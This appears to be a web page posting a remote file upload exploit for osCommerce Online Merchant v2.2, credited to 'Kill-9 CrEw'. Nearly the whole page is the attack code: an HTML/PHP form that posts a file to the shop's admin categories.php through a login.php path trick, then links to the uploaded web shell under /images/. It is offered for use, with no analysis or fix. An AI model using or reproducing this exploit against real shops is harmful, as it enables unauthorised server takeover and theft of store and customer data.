Skip to main content

OsCommerce [Remote File Upload exploit Vulnerability]

Code:
<html>
<head>
<title>Oscommerce Online Merchant - Kill-9 CrEw</title>
</head>
<body>
<div style="text-align: center;"><big
style="color: rgb(253, 0, 0);"><big><big>Oscommerce Kill-9 CrEw<br>
</big></big></big><span
style="color: rgb(102, 102, 102);">(Oscommerce Online Merchant v2.2)</span><br>
</div>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>Oscommerce
script: Remote File Upload in /admin/Categories.php</big></big><br>
<?php $host ="site";
$path ="path";
?>
<form name="new_product"
action="http://<?php echo $host;echo $path; ?>/admin/categories.php/login.php?cPath=&action=new_product_preview"
method="post" enctype="multipart/form-data"><br>
<input name="products_image" type="file"><br>
<input name="submit" value=" Save " type="submit"><br>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>shell
here:</big></big><br>
<?php echo ("Using upload File : <a href=http://$host/$path/images/product_info.php>$host/</>$path</>/images/product_info.php</a></font></body>");
?></form>
</body>
</html>

Share this with your friends
Loading...